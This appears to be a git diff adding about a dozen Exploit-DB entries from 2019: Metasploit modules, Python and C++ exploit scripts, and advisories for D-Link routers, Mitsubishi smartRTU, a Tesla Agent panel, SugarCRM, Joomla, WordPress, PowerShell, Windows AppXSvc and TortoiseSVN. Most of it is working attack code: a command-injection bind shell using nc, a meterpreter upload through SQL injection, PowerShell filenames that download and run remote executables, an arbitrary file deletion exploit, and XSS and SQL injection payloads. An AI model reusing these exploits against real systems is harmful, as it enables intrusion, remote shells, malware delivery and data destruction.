diff --git a/exploits/hardware/webapps/47250.rb b/exploits/hardware/webapps/47250.rb new file mode 100755 index 000000000..946ae13e8 --- /dev/null +++ b/exploits/hardware/webapps/47250.rb @@ -0,0 +1,62 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control', + 'Description' => %q{ + This module attempts to find D-Link router DIR-600M which is +vulnerable to Incorrect Access Control. The vulnerability exists in + wan.htm, which is accessible without authentication. This +vulnerabilty can lead an attacker to manipulate WAN settings. + This module has been tested successfully on Firmware Version +3.01,3.02,3.03,3.04,3.05,3.06. + }, + 'Author' => [ 'Devendra Singh Solanki ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + 'CVE', '2019-13101' + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 08 2019')) + + register_options( + [ + Opt::RPORT(80) + ]) + end + + def run_host(ip) + res = send_request_cgi({'uri' => '/login.htm'}) + if res.nil? or res.code == 404 + print_error("#{rhost}:#{rport} - Host is down.") + return + end + + if res and res.code == 200 and res.body =~ /D-Link/ + print_good("#{rhost}:#{rport} - It is a D-Link router") + else + print_error("#{rhost}:#{rport} - Not a D-Link router") + return + end + + res = send_request_cgi({'uri' => '/wan.htm'}) + + if res and res.code == 200 and res.body =~ /PPPoE/ + print_good("#{rhost}:#{rport} - Router is vulnerable for +Incorrect Access Control. CVE-2019-13101") + else + print_error("#{rhost}:#{rport} - Router is with different firmware.") + return + end + + end +end \ No newline at end of file diff --git a/exploits/linux/dos/47254.txt b/exploits/linux/dos/47254.txt new file mode 100644 index 000000000..299dd2206 --- /dev/null +++ b/exploits/linux/dos/47254.txt @@ -0,0 +1,64 @@ +Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow +Date: 2019-08-13 +Exploit Author: Carter Yagemann +Vendor Homepage: https://abcnotation.com/abc2mtex/ +Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz +Version: 1.6.1 +Tested on: Debian Buster + +An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return +address from the openIn function by providing a long input filename. This +carries similar risk to CVE-2004-1257. + +Setup: + +$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz +$ tar -xzf abc2mtex1.6.1.tar.gz +$ make + +$ gcc --version +gcc (Debian 8.3.0-6) 8.3.0 +Copyright (C) 2018 Free Software Foundation, Inc. +This is free software; see the source for copying conditions. There is NO +warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + +PoC: + +$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA + +GDB: + +We're going to place a breakpoint before and after abc.c:241 to show the overflow. + +$ gdb -q ./abc2mtex +Reading symbols from ./abc2mtex...done. +(gdb) break abc.c:241 +Breakpoint 1 at 0x4139: file abc.c, line 241. +(gdb) break abc.c:242 +Breakpoint 2 at 0x414c: file abc.c, line 242. +(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA +Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA + +Breakpoint 1, openIn (filename=0x7fffffffe240 'A' , "FEDCBA") at abc.c:241 +241 (void) strcpy(savename,filename); +(gdb) bt +#0 openIn (filename=0x7fffffffe240 'A' , "FEDCBA") at abc.c:241 +#1 0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273 +(gdb) c +Continuing. + +Breakpoint 2, openIn (filename=0x7fffffffe240 'A' , "FEDCBA") at abc.c:242 +242 (void) strcat(filename,".abc"); +(gdb) bt +#0 openIn (filename=0x7fffffffe240 'A' , "FEDCBA") at abc.c:242 +#1 0x0000414243444546 in ?? () +#2 0x00007fffffffe4f8 in ?? () +#3 0x0000000200000000 in ?? () +#4 0x0000000000000000 in ?? () +(gdb) c +Continuing. +file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist + +Program received signal SIGSEGV, Segmentation fault. +0x0000414243444546 in ?? () +(gdb) quit \ No newline at end of file diff --git a/exploits/php/remote/47256.rb b/exploits/php/remote/47256.rb new file mode 100755 index 000000000..abc65cbe0 --- /dev/null +++ b/exploits/php/remote/47256.rb @@ -0,0 +1,106 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Tesla Agent Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of tesla agent botnet panel. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ege Balcı ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://prodaft.com'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'WfsDelay' => 5, + }, + 'Platform' => ['php'], + 'Arch' => [ ARCH_PHP ], + 'Targets' => + [ + ['PHP payload', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "July 10 2018", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']), + ] + ) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'), + ) + #print_status(res.body) + if res && res.body.include?('SQLSTATE') + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + check + + name = '.'+Rex::Text.rand_text_alpha(4)+'.php' + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'), + 'encode_params' => true, + 'vars_get' => { + 'table' => 'passwords', + 'primary' => 'password_id', + 'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}', + 'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"") + } + ) + + if res && res.code == 200 && res.body.include?('recordsTotal') + print_good("Payload uploaded as #{name}") + else + print_error('Payload upload failed :(') + Msf::Exploit::Failed + end + + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5 + ) + + if res && res.code == 200 + print_good("Payload successfully triggered !") + else + print_error('Payload trigger failed :(') + Msf::Exploit::Failed + end + + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47234.py b/exploits/php/webapps/47234.py new file mode 100755 index 000000000..77a6e9ca9 --- /dev/null +++ b/exploits/php/webapps/47234.py @@ -0,0 +1,38 @@ +#!/usr/bin/python + +# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download +# Date: 29 June 2019 +# Exploit Author: (@xerubus | mogozobo.com) +# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local +# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/ +# Firmware Version: Misubishi Electric 2.02 & INEA 3.0 +# CVE-ID: CVE-2019-14927 +# Full write-up: https://www.mogozobo.com/?p=3593 + +import sys, os, requests, socket + +os.system('clear') + +print("""\ + _ _ + ___ (~ )( ~) + / \_\ \/ / +| D_ ]\ \/ -= Conf_Me-smartRTU by @xerubus =- +| D _]/\ \ -= We all have something to hide =- + \___/ / /\ \\ + (_ )( _) + @Xerubus + """) + +host = raw_input("Enter RTU IP address: ") + +php_page = '/saveSettings.php' +url = "http://{}{}".format(host, php_page) + +print "[+] Attempting to download smartRTU configuration file" + +r = requests.get(url) +if r.status_code == 200: + print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n" + with open('smartRTU_conf.xml', 'w') as f: + f.write(r.content) \ No newline at end of file diff --git a/exploits/php/webapps/47235.py b/exploits/php/webapps/47235.py new file mode 100755 index 000000000..cd27f151e --- /dev/null +++ b/exploits/php/webapps/47235.py @@ -0,0 +1,69 @@ +#!/usr/bin/python + +# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection +# Date: 29 June 2019 +# Exploit Author: (@xerubus | mogozobo.com) +# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local +# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/ +# Firmware Version: Misubishi Electric 2.02 & INEA 3.0 +# CVE-ID: CVE-2019-14931 +# Full write-up: https://www.mogozobo.com/?p=3593 + +import sys, os, requests, socket + +os.system('clear') + +print("""\ + _ _ + ___ (~ )( ~) + / \_\ \/ / +| D_ ]\ \/ -= Bind_Me-smartRTU by @xerubus =- +| D _]/\ \ -= We all have something to hide =- + \___/ / /\ \\ + (_ )( _) + @Xerubus + """) + +host = raw_input("Enter RTU IP address: ") +port = raw_input("Enter bind shell port number: ") + +php_page = '/action.php' +url = "http://{}{}".format(host, php_page) +payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'} + +print "\n[+] Building payload" +print "[+] Sending payload" +print "[+] Attempting connection to smartRTU" + +try: + r = requests.post(url, data=payload, timeout=1) +except: + pass + +port = (int(port)) + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + + try : + print "[+] Connected to the smartRTU!\n" + while 1: + cmd = raw_input("(smartRTU-shell) # "); + s.send(cmd + "\n"); + result = s.recv(1024).strip(); + if not len(result) : + print "\n[!] Play nice now skiddies....\n\n" + s.close(); + break; + print(result); + + except KeyboardInterrupt: + print "\n[+] ^C Received, closing connection" + s.close(); + except EOFError: + print "\n[+] ^D Received, closing connection" + s.close(); + +except socket.error: + print "[!] Failed to connect to bind shell." \ No newline at end of file diff --git a/exploits/php/webapps/47247.txt b/exploits/php/webapps/47247.txt new file mode 100644 index 000000000..2a1a569a5 --- /dev/null +++ b/exploits/php/webapps/47247.txt @@ -0,0 +1,30 @@ +# Exploit Title: 0Day UnauthenticatedXSS SugarCRM Enterprise +# Google Dork: N/A +# Date: 11.08.2019 +# Exploit Author: Ilca Lucian Florin +# Vendor Homepage: https://www.sugarcrm.com +# Version: 9.0.0 +# Tested on: Windows 7 / Internet Explorer 11 / Google Chrome 76 +# CVE : 2019-14974 + +The application fails to sanitize user input on https://sugarcrm-qms.XXX.com/mobile/error-not-supported-platform.html and reflect the input directly in the HTTP response, allowing the hacker to exploit the vulnerable parameter and have malicious content executed in the victim's browser. + +Steps to reproduce: + +1.Attacker will craft a malicious payload and create a legitimate link with the payload included; +2. Attacker will send the link to the victim; +3. Upon clicking on the link, the malicious payload will be reflected in the response and executed in the victim’s browser. + +The behavior can be observed by visiting the following URL: + +https://server/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms:// + +Clicking on FULL VERSION OF WEBSITE will trigger the XSS. + +Impact statement: + +Although requiring user interaction, reflected XSS impact might range from web defacement to stealing user info and full account takeover, depending on the circumstances. + +Recommendation: + +Always ensure to validate parameters input and encode the output. \ No newline at end of file diff --git a/exploits/php/webapps/47249.txt b/exploits/php/webapps/47249.txt new file mode 100644 index 000000000..aac1ac173 --- /dev/null +++ b/exploits/php/webapps/47249.txt @@ -0,0 +1,23 @@ +#Exploit Title: Joomla! component com_jsjobs - 'customfields.php' SQL Injection +#Dork: inurl:"index.php?option=com_jsjobs" +#Date: 13.08.19 +#Exploit Author: qw3rTyTy +#Vendor Homepage: https://www.joomsky.com/ +#Software Link: https://www.joomsky.com/5/download/1 +#Version: 1.2.5 +#Tested on: Debian/nginx/joomla 3.9.0 +##################################### +#Vulnerability details: +##################################### +Vulnerable code is in line 171 in file site/models/customfields.php + + 169 function dataForDepandantField( $val , $childfield){ + 170 $db = $this->getDBO(); + 171 $query = "SELECT userfieldparams,fieldtitle FROM `#__js_job_fieldsordering` WHERE field = '".$childfield."'"; //!!! + 172 $db->setQuery($query); + 173 $data = $db->loadObject(); + +##################################### +#PoC: +##################################### +$> sqlmap.py -u "http://localhost/index.php?option=com_jsjobs&task=customfields.datafordepandantfield&fvalue=0&child=0" --random-agent --dbms=mysql --method GET -p child --technique E \ No newline at end of file diff --git a/exploits/php/webapps/47251.txt b/exploits/php/webapps/47251.txt new file mode 100644 index 000000000..fa9eff0ce --- /dev/null +++ b/exploits/php/webapps/47251.txt @@ -0,0 +1,51 @@ +# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5 +# Google Dork: inurl:"/wp-content/plugins/download-manager +# Date: 24 may, 2019 +# Exploit Author: Princy Edward +# Exploit Author Blog : https://prinyedward.blogspot.com/ +# Vendor Homepage: https://www.wpdownloadmanager.com/ +# Software Link: https://wordpress.org/plugins/download-manager/ +# Tested on: Apache/2.2.24 (CentOS) +POC + +#1 + +There is no CSRF nonce check performed in "POST +/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request. + +#Code + +
+ + + + + + + +
+ +#2 + +There is no CSRF nonce check performed in "POST +/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat +e&id=default" request. + +#Code + +
+ + + + + + +
\ No newline at end of file diff --git a/exploits/windows/dos/47248.py b/exploits/windows/dos/47248.py new file mode 100755 index 000000000..8c6687d27 --- /dev/null +++ b/exploits/windows/dos/47248.py @@ -0,0 +1,144 @@ +''' +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt +[+] ISR: Apparition Security + + +[Vendor] +www.microsoft.com + + +[Product] +Windows PowerShell + +Windows PowerShell is a Windows command-line shell designed especially for system administrators. +PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination. + + +[Vulnerability Type] +Unsanitized Filename Command Execution + + +[CVE Reference] +N/A + + +[Security Issue] +PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. +This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file; +or the running of unexpected commands straight from the filename itself without the need for a second file. + +For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf. +Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard +Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script. + +However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working. + +Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger +the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts +as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell. + +My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant. +Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest) +abbreviated for space then it sleeps for 2 seconds and finally executes. + +C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'")) + +This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed. +We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are +commands can be stored. + +For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files. + +First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe". +c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'")) + +Give the PS script a normal begining name, then separate commands using ";" semicolon e.g. + +Test;powershell -e ;2.ps1 + +Create the executable without a file extension to save space for the filename then save it back using the -O parameter. +The "-e" is abbreviated for EncodedCommand to again save filename space. + +Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever. +Double click to open in PowerShell watch the file get downloaded saved and executed! + +My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory. + +Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string! + + +[Exploit / PoC] +''' + +from base64 import b64encode +import argparse,sys +#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC +#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. +#Expects hostname/ip-addr of web-server housing the exploit. +#By hyp3rlinx +#Apparition Security +#==================== + + +def parse_args(): + parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") + parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") + parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") + return parser.parse_args() + +def main(args): + PSEmbedFilenameMalwr="" + if args.ipaddress: + PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name + return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')) + +def create_file(payload): + f=open("Test;PowerShell -e "+payload+";2.ps1", "w") + f.write("Write-Output 'Have a nice day!'") + f.close() + +if __name__=="__main__": + + parser = argparse.ArgumentParser() + PSCmds = main(parse_args()) + + if len(sys.argv)==1: + parser.print_help(sys.stderr) + sys.exit(1) + + create_file(PSCmds) + print "PowerShell - Unsantized Filename Command Execution File created!" + print "By hyp3rlinx" + +''' +[POC Video URL] +https://www.youtube.com/watch?v=AH33RW9g8J4 + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: July 20, 2019 +MSRC "does not meet the bar for security servicing" : July 23, 2019 +August 1, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). +''' + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/47253.cpp b/exploits/windows/local/47253.cpp new file mode 100644 index 000000000..a364e333b --- /dev/null +++ b/exploits/windows/local/47253.cpp @@ -0,0 +1,244 @@ +/* +# Author : Abdelhamid Naceri +# Discovered On : 13/08/2019 +# Description : An Elevation Of Privileges Exist when the microsoft AppXSvc +Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion +from a low integrity user . +# Still Unpatched On 13/08/2019 +Here Is A Demo Video https://youtu.be/jqYwMcNvTtM +*/ +#include"windows.h" +#include"iostream" +#include"conio.h" +#include"stdio.h" +#include"tlhelp32.h" +#include"cstdio" +#include"wchar.h" +#include"process.h" +#include"wchar.h" +#include"string" +#include"tchar.h" + +#pragma warning(disable : 4996) +#pragma comment(lib, "advapi32.lib") +#ifndef UNICODE +typedef std::string String; +#else +typedef std::wstring String; +#endif + +using namespace std; + +bool FileExists(const wchar_t* file) { + if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(file) && GetLastError() == ERROR_FILE_NOT_FOUND) + { + return false; + } + else { + return true; + } +} + +void remove_dir(const wchar_t* folder) +{ + std::wstring search_path = std::wstring(folder) + _T("/*.*"); + std::wstring s_p = std::wstring(folder) + _T("/"); + WIN32_FIND_DATA fd; + HANDLE hFind = ::FindFirstFile(search_path.c_str(), &fd); + if (hFind != INVALID_HANDLE_VALUE) { + do { + if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { + if (wcscmp(fd.cFileName, _T(".")) != 0 && wcscmp(fd.cFileName, _T("..")) != 0) + { + remove_dir((wchar_t*)(s_p + fd.cFileName).c_str()); + } + } + else { + DeleteFile((s_p + fd.cFileName).c_str()); + } + } while (::FindNextFile(hFind, &fd)); + ::FindClose(hFind); + _wrmdir(folder); + } +} + +void killProcessByName(const wchar_t* filename) +{ + HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL); + PROCESSENTRY32 pEntry; + pEntry.dwSize = sizeof(pEntry); + BOOL hRes = Process32First(hSnapShot, &pEntry); + while (hRes) + { + if (wcscmp(pEntry.szExeFile, filename) == 0) + { + HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0, + (DWORD)pEntry.th32ProcessID); + if (hProcess != NULL) + { + TerminateProcess(hProcess, 9); + CloseHandle(hProcess); + } + } + hRes = Process32Next(hSnapShot, &pEntry); + } + CloseHandle(hSnapShot); +} + +bool IsProcessRunning(const wchar_t* processName) +{ + bool exists = false; + PROCESSENTRY32 entry; + entry.dwSize = sizeof(PROCESSENTRY32); + + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + + if (Process32First(snapshot, &entry)) + while (Process32Next(snapshot, &entry)) + if (!_wcsicmp(entry.szExeFile, processName)) + exists = true; + + CloseHandle(snapshot); + return exists; +} + +bool dirExists(const std::string& dirName_in) +{ + DWORD ftyp = GetFileAttributesA(dirName_in.c_str()); + if (ftyp == INVALID_FILE_ATTRIBUTES) + return false; + + if (ftyp & FILE_ATTRIBUTE_DIRECTORY) + return true; + + return false; +} + +void KillEdge() +{ + killProcessByName(L"MicrosoftEdge.exe"); +} + +void StartEdge() +{ + try + { + system("start microsoft-edge:"); + } + catch (...){} +} + +void exploit(const char* path) { + //Inintializing the variable before begining + int attempt = 0; + string command; + wchar_t* userprofile = _wgetenv(L"USERPROFILE"); + const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe"); + //I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution + //I deleted him first + const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState"); + wstring froamingpath(userprofile); + froamingpath += wstring(roamingpath); + wstring fullpath(userprofile); + fullpath += std::wstring(relpath); + wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str(); + wstring fpath(szBuffsrc); + string strfpath(fpath.begin(), fpath.end()); + //Check If MS-Edge Need To Write DACL Or Not + + if (dirExists(strfpath) != true) { + printf("[!] Wait MS-Edge Need To Write The DACL"); + StartEdge(); + for (;;) { + Sleep(1000); + if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; } + } + StartEdge(); + Sleep(7000); + KillEdge(); + printf("\r "); + + } + + //End Of Check + printf("\r# Author : Abdelhamid Naceri\n"); + printf("# Tested On Windows 10 32&64bit\n"); + printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n"); + printf("[+] Checking If Path Exist ..."); + Sleep(2000); + if (dirExists(path) != true) { + printf("Your Path Is Invalid"); + ExitProcess(EXIT_FAILURE); } + else { + printf("Exist !\n"); + KillEdge(); + printf("[+] Starting MS-Edge ...\n"); + StartEdge(); + Sleep(4000); + printf("[+] Killing MS-Edge ...\n"); + KillEdge(); + Sleep(3000); + printf("[+] Wipping MS-Edge Directory ...\n"); + killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files + remove_dir(roamingpath); + remove_dir(szBuffsrc); + Sleep(2000); + remove_dir(szBuffsrc); + printf("[+] Checking If Directory Exist Anymore ..."); + if (dirExists(strfpath) == true) { + + if (dirExists(strfpath) == true) { + printf("Something Went Wrong"); + printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue"); + command = "explorer "; + command.append(strfpath); + system(command.c_str()); + _getch(); + goto Continue; + } + } + else { +Continue: + printf(" Done\n"); + Sleep(3000); + printf("[+] Attempting to Create Junction To Target ...\n"); + command = "mklink /J "; + command.append("\""); + command.append(strfpath); + command.append("\""); + command.append(" "); + command.append("\""); + command.append(path); + command.append("\""); + system(command.c_str()); + printf("Done\n"); + Sleep(3000); + printf("[+] Firing Up MS-Edge Again ...\n"); + StartEdge(); + do { Sleep(1000); } while (IsProcessRunning(L"MicrosoftEdge.exe")); + Sleep(3000); + StartEdge(); + command = "explorer "; + command.append(path); + printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n"); + system(command.c_str()); + printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n"); + _getch(); + printf("Cleaning ..."); + _wremove(szBuffsrc); + _wrmdir(szBuffsrc); + ExitProcess(EXIT_SUCCESS); + } + } +} + +int main(int argc, char* argv[]) { + if (argc == 2) {exploit(argv[1]);} + else { + printf("# Author : Abdelhamid Naceri\n"); + printf("# Tested On Windows 10 1903 32&64bit\n"); + printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n"); + printf("[!] Usage : poc.exe TargetPath"); + } + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/exploits/windows/webapps/47252.txt b/exploits/windows/webapps/47252.txt new file mode 100644 index 000000000..b1030dde2 --- /dev/null +++ b/exploits/windows/webapps/47252.txt @@ -0,0 +1,194 @@ +Document Title: +=============== +TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2188 + +Product: +https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/ + +Ticket: https://groups.google.com/forum/#!forum/tortoisesvn + +http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422 + +CVE-ID: +======= +CVE-2019-14422 + + +Release Date: +============= +2019-08-13 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2188 + + +Common Vulnerability Scoring System: +==================================== +8.8 + + +Vulnerability Class: +==================== +Code Execution + + +Current Estimated Price: +======================== +4.000€ - 5.000€ + + +Product & Service Introduction: +=============================== +TortoiseSVN is a really easy to use Revision control / version control / +source control software for Windows. +It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and +easy user interface for Subversion. +It is developed under the GPL. Which means it is completely free for +anyone to use, including in a commercial +environment, without any restriction. The source code is also freely +available, so you can even develop your +own version if you wish to. Since it's not an integration for a specific +IDE like Visual Studio, Eclipse or +others, you can use it with whatever development tools you like, and +with any type of file. + +(Copy of the about page: https://tortoisesvn.net/about.html ) + + +Abstract Advisory Information: +============================== +A vulnerability laboratory researcher (vxrl team) discovered a remote +code execution vulnerability in the TortoiseSVN v1.12.1 software. + + +Vulnerability Disclosure Timeline: +================================== +2019-08-13: Public Disclosure (Vulnerability Laboratory) + +Affected Product(s): +==================== +TortoiseSVN +Product: TortoiseSVN - Software 1.12.1 + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A remote code execution vulnerability has been uncovered in the official +TortoiseSVN v1.12.1 software. +The vulnerability typ allows remote attackers to execute arbitrary codes +to compromise a target computer system. + +The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff +operation on Excel workbooks, which could be used to open remote +workbooks without protection from macro security settings to execute +arbitrary code. + +The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a +customised diff on [file1] and [file2] based on the file extension. +For xls files, it will execute the script `diff-xls.js` using wscript, +which will open the two files for analysis without any macro +security warning. An attacker can exploit this by putting a macro virus +in a network drive, and force the victim to open the workbooks +and execute the macro inside. Since the macro is triggered through +wscript, to make the attack less visible, one could kill the wscript +process and quit the excel program after the code was executed. + + +Proof of Concept (PoC): +======================= +The vulnerability could be triggered by visiting a specially crafted URL +via web browser. +To reproduce the vulnerability, one could simply create a .url file or +open the URL with a browsers, +but a notification prompt may be shown for the latter case. + +Checkout +the Repo with TortoiseSVN + +where VBoxSvrv is the remote network drive controlled by the attacker, +v.xlsm is the macro virus and w.xlsx is just an empty excel workbook. + +Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar +Password: 23vxrl23 + +PoC: Video +https://www.youtube.com/watch?v=spvRSC377vI + + +Security Risk: +============== +The security risk of the remote code execution vulnerability in the +software component 